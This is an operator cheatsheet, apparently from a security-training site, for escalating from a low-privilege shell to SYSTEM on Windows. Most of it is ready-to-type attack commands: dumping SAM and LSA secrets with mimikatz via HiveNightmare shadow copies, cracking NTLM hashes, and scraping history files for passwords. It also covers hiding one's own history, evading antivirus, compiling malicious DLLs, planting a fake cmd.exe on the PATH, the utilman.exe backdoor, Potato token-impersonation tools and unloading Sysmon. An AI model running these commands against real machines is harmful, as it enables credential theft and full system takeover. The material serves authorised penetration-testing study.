Complete Windows privilege-escalation reference: enumeration, password looting (SAM, HiveNightmare, LAPS, unattend.xml, SessionGopher), service misconfigs (DLL hijack, unquoted paths, $PATH interception, weak DACLs), kernel CVEs, AlwaysInstallElevated, vulnerable drivers, PrintNightmare, LOLBAS, and the full Se* privilege-abuse matrix (Potato family).
0. Overview & methodology
Windows — Privilege Escalation
This is a complete operator reference for local privilege escalation on Windows — from "low-priv user shell" to NT AUTHORITY\SYSTEM. It covers everything that a CRTP / OSCP / OSEP / CRTO / HTB Pro Lab candidate is expected to know, organised into the order you will normally execute it on a real engagement: enumerate → loot → abuse misconfig → exploit kernel/driver → impersonate.
Every command below is the literal command you will type at the target shell or on Kali. We deliberately keep the cheatsheet style of the source — commands first, prose only where it adds context. When you copy-paste, treat tags as values you need to substitute.
Suggested mental model
Phase
What you are actually doing
1. Recon
Who am I? What groups? What OS? What network? Domain joined?
2. Loot
Saved creds, history files, config files, registry, LSASS where allowed
SeImpersonate via Potato; vulnerable signed drivers (BYOVD); kernel CVE
5. Impersonation
Token privileges → full SYSTEM (SeImpersonate, SeBackup, SeRestore, SeDebug)
6. Persistence
Out of scope here — covered in the AD attack notes
☼ Pro tip — Always start with one of the automated tools (winPEAS / PowerUp / Seatbelt / PrivescCheck). Then read the output by hand — tooling misses subtle wins like password hints in Description fields, custom services, or weird ACLs on a single registry key.
1. Tools
You should know at least one tool from each category. winPEAS + PrivescCheck are the modern duo; PowerUp + Sherlock/Watson are still extremely common on older boxes.
Watson is a .NET 2.0/4.0 compliant C# implementation that audits installed KBs and maps to known kernel/elevation CVEs. Sherlock (PowerShell) is deprecated but still useful on Win7 boxes.
Standalone executable to scan for simple Windows privilege-escalation vectors — ACL audits, service misconfigs, registry keys. Output is verbose but exhaustive.
The de-facto modern enumeration tool. Coloured output, finds 90% of misconfigurations automatically. Available as winPEAS.exe, winPEAS.bat, winPEASany.exe.
cmd
shell
# .bat (no AV detections, ASCII output)
.\winPEAS.bat
# .exe (richer)
.\winPEASany.exe<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
WES-NG (Windows Exploit Suggester — Next Generation)
bash
shell
# First obtain systeminfo
systeminfo
systeminfo > systeminfo.txt
# Then feed it to wesng
python3 wes.py --update-wes
python3 wes.py --update
python3 wes.py systeminfo.txt<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
☼ Pro tip — Rule of thumb on a real engagement: drop winPEAS first for a fast read, then PrivescCheck for the deeper audit, then Seatbelt if you want extra coverage on certs/AMSI/AppLocker. The three tools overlap deliberately — if all three flag something, it’s reliable.
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Environment variables
cmd / ps
shell
set
Get-ChildItem Env: | ft Key,Value<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Logical drives
cmd / ps
shell
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"} | ft Name,Root<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
ⓘ Note — The systeminfo + wmic qfe output is what WES-NG and Watson consume to map missing patches to public CVEs. Save them early — they are also the easiest way to identify the Windows build for kernel-exploit selection.
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Logon policy (brute-force feasibility)
cmd
shell
net accounts<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Details about a specific user
cmd
shell
net user administrator
net user admin
net user %USERNAME%<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Local groups & their members
cmd / ps
shell
net localgroup
Get-LocalGroup | ft Name
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
☼ Pro tip — Look at whoami /privbefore running anything else — a single SeImpersonatePrivilege = Enabled often makes the rest of the cheatsheet irrelevant (jump straight to Section 23 Potato).
Identify AV / EDR before staging payloads — Windows Defender will flat-out kill winPEAS.exe, mimikatz.exe, and most Potato binaries unless you obfuscate.
☼ Pro tip — Other quick AV/EDR detectors: tasklist /svc | findstr -i defender, sc query windefend, look for processes from CrowdStrike, SentinelOne, cylance, cb* (Carbon Black), MsMpEng.exe.
6. Default writeable folders
These folders are writeable by regular users on a default Windows installation. They are your dropzone for payloads, the search target for DLL-hijack candidates, and useful staging for the $PATH interception attack (Section 12).
Password looting is the highest ROI activity in any Windows engagement. Spend the bulk of your time here.
SAM & SYSTEM hives
The Security Account Manager (SAM) database stores local-account NTLM hashes; it’s mounted at HKLM\SAM and encrypted with a boot key derived from the SYSTEM hive. Both files live in %SYSTEMROOT%/system32/config/; older Windows also keeps backups in %SYSTEMROOT%/repair/.
cmd / kali
shell
# Locations
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
# Dump hashes (need administrative rights, or HiveNightmare below)
pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
# Crack or PtH
john -format=NT /root/sam.txt
hashcat -m 1000 sam.txt rockyou.txt<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Microsoft mistakenly left SAM / SECURITY / SYSTEM readable to BUILTIN\Users via Volume Shadow Copies. Any low-privilege user can read the hives from a VSS snapshot, then dump hashes locally.
cmd
shell
# Confirm the vulnerability
C:\Windows\System32> icacls config\SAM
config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX) token::whoami /full
# List shadow copies available
mimikatz> misc::shadowcopies
# Extract local SAM hashes via the VSS snapshot
mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
# Extract LSA secrets
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
LAPS settings
Local Administrator Password Solution (LAPS) stores randomised local admin passwords in HKLM\Software\Policies\Microsoft Services\AdmPwd. If you can read the LAPS attributes you may already have the local admin password.
# Disable it for your own session (OPSEC)
Set-PSReadlineOption -HistorySaveStyle SaveNothing
# Read it on the target
type %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
☼ Pro tip — After every action that lands you a new shell, immediately re-run findstr /si password ..., cmdkey /list, and check ConsoleHost_history.txt for the previous user. That single habit lands more privesc than any tool.
8. EoP — Processes & tasks
Running processes
cmd / ps
shell
tasklist /v
net start
sc query
Get-Service
Get-Process
Get-WmiObject -Query "Select * from Win32_Process" | where { $_.Name -notlike "svchost*" } | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Services list
cmd
shell
net start
wmic service list brief
tasklist /SVC<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Scheduled tasks
cmd / ps
bash
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtask.txt; cat schtask.txt | grep "SYSTEM\|Task To Run"
Get-ScheduledTask | where { $_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Startup items
cmd
shell
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
ⓘ Note — A scheduled task that runs as SYSTEM and references a writable script path is a direct privesc — modify the script and wait for the schedule.
9. EoP — Incorrect service permissions
A service running as Administrator/SYSTEM with incorrect file or registry permissions might allow EoP. The pattern is always: replace the binary (or DLL it loads, or service config), restart the service, get SYSTEM.
Common patterns to look for:
Orphaned installs — uninstalled software whose service still references a now-writable directory
DLL Hijacking — the service loads a DLL that doesn’t exist on disk, but a writable folder is searched first
Weak PATH directories — BUILTIN\Users:(F/M/W) on a folder containing service binaries
Find missing DLLs & build a malicious one
kali
shell
# find missing DLL
- Find-PathDLLHijack PowerUp.ps1
- Process Monitor : check for "Name Not Found"# compile a malicious DLL
- For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
- For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
icacls "C:\Program Files\Vuln Service\service.exe"# We are looking for these on the file or its directory:# BUILTIN\Users:(F) - Full access# BUILTIN\Users:(M) - Modify access# BUILTIN\Users:(W) - Write-only access<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Example — Windows 10 CVE-2019-1322 UsoSvc
Service runs as LocalSystem; if you sit in the NT SERVICE\ service-account context (e.g. nt service\mssqlserver) you can rewrite the binPath and restart the service.
WSL (Windows Subsystem for Linux) lets a non-admin Windows user run a Linux distro. With root inside WSL you can bind to any port without elevation — useful when Defender is blocking native Windows shells. The default user is set per-distro; --default-user root changes it without a password.
Binary bash.exe can also be found in: C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe.
Alternatively explore the WSL filesystem in C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\.
11. EoP — Unquoted service paths
The classic. If a service’s BINARY_PATH_NAME contains a space and is not quoted (e.g. C:\Program Files\Vuln Service\bin.exe), Windows will tokenise on whitespace and try in order: C:\Program.exe, then C:\Program Files\Vuln.exe, etc. Drop a binary at one of those positions in a folder you can write to and restart the service.
%PATH% contains a writeable folder with low privileges.
The writeable folder is before the folder that contains the legitimate binary.
cmd / ps
shell
# List contents of the PATH environment variable# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32
$env:Path
# See permissions of the target folder# EXAMPLE OUTPUT: BUILTIN\Users: GR,GW
icacls.exe "C:\Program Files\nodejs\"# Place our evil-file in that folder.
copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Because C:\Program Files\nodejs is beforeC:\WINDOWS\system32 on the PATH variable, the next time the user runs cmd.exe, our evil version in the nodejs folder will run instead of the legitimate one in the system32 folder.
13. EoP — Named pipes
Find named pipes:[System.IO.Directory]::GetFiles("\\.\pipe\")
Check named-pipe DACL:pipesec.exe
Reverse-engineer the consuming software
Send data through the named pipe:program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe
ⓘ Note — Named-pipe impersonation is the foundation of the entire Potato family (RottenPotato/JuicyPotato/RoguePotato/PrintSpoofer/EFSPotato — see Section 23).
14. EoP — Kernel exploitation
Use kernel exploitation as a last resort — it’s noisy, can BSOD the box, and AV will frequently flag the precompiled binaries. Always run WES-NG or Watson against the target’s systeminfo output before attempting.
When both HKLM and HKCU have AlwaysInstallElevated=1, any user can run an MSI as NT AUTHORITY\SYSTEM. This is a one-line privesc and is still surprisingly common on legacy estates.
Custom Actions in MSI allow developers to specify scripts or executables to run at various points during installation. If a CustomAction is misconfigured (calls a script from a user-writable path, races with the user, or pops a conhost as SYSTEM), msiexec /fa ("repair") will re-execute them with SYSTEM privileges.
mandiant/msi-search — map installed products to their MSI files
cmd
shell
wmic product get identifyingnumber,name,vendor,version<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
Trigger CustomActions via the /fa repair parameter. We can use both the IdentifyingNumber GUID or the path to the installer c:\windows\installer\XXXXXXX.msi. The repair runs with the NT SYSTEM account.
Missing quiet parameter: spawns conhost.exe as SYSTEM. Use Ctrl+A to select text and pause; then conhost → properties → legacy console mode link → Internet Explorer → Ctrl+O → cmd.exe.
GUI with direct actions: opens a URL, start the browser and pivot.
Binaries/scripts loaded from user-writable paths: you might need to win a race condition.
DLL hijacking / search-order abuse.
PowerShell -NoProfile missing: add custom commands into your profile.
Any application running as SYSTEM that allows an unprivileged user to spawn a CMD, browse directories, or open arbitrary files = trivial SYSTEM shell. Look for kiosk applications, vendor-installed shortcut managers, accessibility panels, and Microsoft’s own Help & Support tooling.
Classic example: Windows Help and Support (Windows + F1), search for "command prompt", click on "Click to open Command Prompt".
17. EoP — Evaluating vulnerable drivers
Look for vulnerable kernel drivers loaded on the box — the BYOVD ("Bring Your Own Vulnerable Driver") technique abuses a signed-but-buggy driver that an attacker carries onto the host. Often we don’t spend enough time looking at this category.
Living Off The Land Drivers (LOLDrivers) — a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks.
Native binary DriverQuery.exe
powershell
shell
PS C:\Users\Swissky> driverquery.exe /fo table /si
Module Name Display Name Driver Type Link Date
=========== ==================== =========== ====================
1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM
3ware 3ware Kernel 5/18/2015 6:28:03 PM
ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM
AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM
acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM
acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM
AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM
acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM
ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 AM<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
If you have local administrator access on a machine try to list shadow copies — it’s an easy way to read SAM/NTDS/locked files without dealing with the live registry/file handles.
cmd
shell
# List shadow copies using vssadmin (Needs Administrator Access)
vssadmin list shadows
# List shadow copies using diskshadow
diskshadow list shadows all
# Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
21. EoP — Local administrator → NT SYSTEM
The simplest possible local-admin → SYSTEM bridge — PsExec with -i -s spawns an interactive process as the LocalSystem account.
☼ Pro tip — Other paths to SYSTEM from local-admin: nt-service-create & sc create with obj= LocalSystem; schedule a task at boot/now; at (legacy); RunAsTI for TrustedInstaller.
22. EoP — Living Off The Land Binaries & Scripts (LOLBAS)
The LOLBAS project (Living Off The Land Binaries, Scripts, and Libraries) documents every signed-by-Microsoft binary that can be misused for: bypassing AppLocker, downloading files, executing arbitrary code, dumping LSASS, etc.
A LOLBin/Lib/Script must:
Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft
Have extra "unexpected" functionality. Intended use cases are not documented — exceptions are application-whitelisting bypasses
Have functionality that would be useful to an APT or red team
Token privileges are the most lucrative quick-wins on modern Windows. Always run whoami /priv first — one of these enabled is often the entire engagement.
Quick reference matrix
Privilege
Impact
Tool
Execution path
Remarks
SeAssignPrimaryToken
Admin
3rd-party tool
Impersonate tokens with potato.exe / rottenpotato.exe / juicypotato.exe
Same vector as SeImpersonate
SeImpersonate
Admin
Potato family
Spin up a fake COM/RPC server, force SYSTEM to authenticate, impersonate its token
JuicyPotato (legacy), PrintSpoofer / EFSPotato / RoguePotato / GodPotato on modern Windows
SeBackup
Threat
Built-in
Read sensitive files with robocopy /b; copy SAM/SYSTEM/NTDS
Combine with SeRestore. Read MEMORY.DMP if available.
SeCreateToken
Admin
3rd-party tool
Create arbitrary token including local-admin rights with NtCreateToken
—
SeDebug
Admin
PowerShell
Duplicate the lsass.exe token; inject into any process
Script: FuzzySecurity
SeLoadDriver
Admin
3rd-party tool
Load a buggy kernel driver such as szkg64.sys or capcom.sys and exploit it
CVE-2018-15732 (szkg64). Alternatively unload security drivers with fltMC sysmondrv
SeRestore
Admin
PowerShell
Enable privilege (Enable-SeRestorePrivilege); rename utilman.exe to utilman.old; copy cmd.exe over utilman.exe; lock console; press Win+U → SYSTEM cmd
May be detected by some AV. Alt: replace service binaries under Program Files using the same privilege.
Manipulate tokens to have local-admin rights included
Often requires combination with other privileges
SeManageVolume
Admin
3rd-party tool
Combined with SeBackup/SeRestore lets you mount any volume and rewrite system files
See SeManageVolumeExploit (CsEnox)
SeShutdown
Threat
Built-in
Trigger shutdown/restart; can be chained with scheduled tasks for persistence
Not direct EoP
Restore a service account’s privileges
When a service account loses SeImpersonatePrivilege (e.g. by changing service identity), you can sometimes re-grant it through Group Policy or directly via secedit. Full cheatsheet: github.com/gtworek/Priv2Admin and PrivescCheck.
Meterpreter getsystem and alternatives
msf
shell
# msf
meterpreter > getsystem
# uses (in order):# 1. Named pipe impersonation (in memory / admin)# 2. Named pipe impersonation (dropper / admin)# 3. Token duplication (in memory / admin)# 4. Named pipe impersonation (RPCSS variant)# 5. Named pipe impersonation (PrintSpooler variant)# 6. Named pipe impersonation (EFSRPC variant - EfsPotato)<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
RottenPotato — classic token impersonation
cmd
shell
# Drop on target with SeImpersonatePrivilege
.\RottenPotato.exe<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
JuicyPotato — abuse of golden COM CLSIDs
cmd
shell
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
# See: https://ohpe.it/juicy-potato/CLSID/ for working CLSIDs per OS<i class="bi bi-clipboard"></i><i class="bi bi-clipboard"></i>
⚠ Caution — JuicyPotato is patched on Windows 10 build 1809 and Server 2019+. Use PrintSpoofer, RoguePotato, GodPotato, EFSPotato on modern boxes.
Privileged File Write (one-shot SYSTEM via writeable file mapping)
A class of attacks that abuses Windows components which run as SYSTEM and load DLLs from predictable paths — if your low-priv user can write to one of those paths, you write a malicious DLL and trigger the load:
Technique
Idea
DiagHub
diagtrack service loads DLLs from C:\Windows\System32; combine with arbitrary file write
UsoDLLLoader
Update Orchestrator Service (UsoSvc) loads from a predictable path
WerTrigger
Windows Error Reporting service loads wer*.dll
WerMgr
Similar — WER manager loads vulnerable DLL chain on crash dispatch
24. Methodology recap & defender checklist
Recommended order of operations on a real engagement
#
Action
1
whoami /priv & whoami /groups — do I already have a winning privilege?
2
systeminfo, wmic qfe — capture OS + patches for kernel-CVE selection
3
Run winPEAS — let it find the easy wins
4
Read it by hand — tooling will miss subtle ACL/description-field wins
5
cmdkey /list, history files, registry password dump
6
Service permission audit (accesschk -uwcqv "Authenticated Users")
7
Look for AlwaysInstallElevated (one query, free SYSTEM)
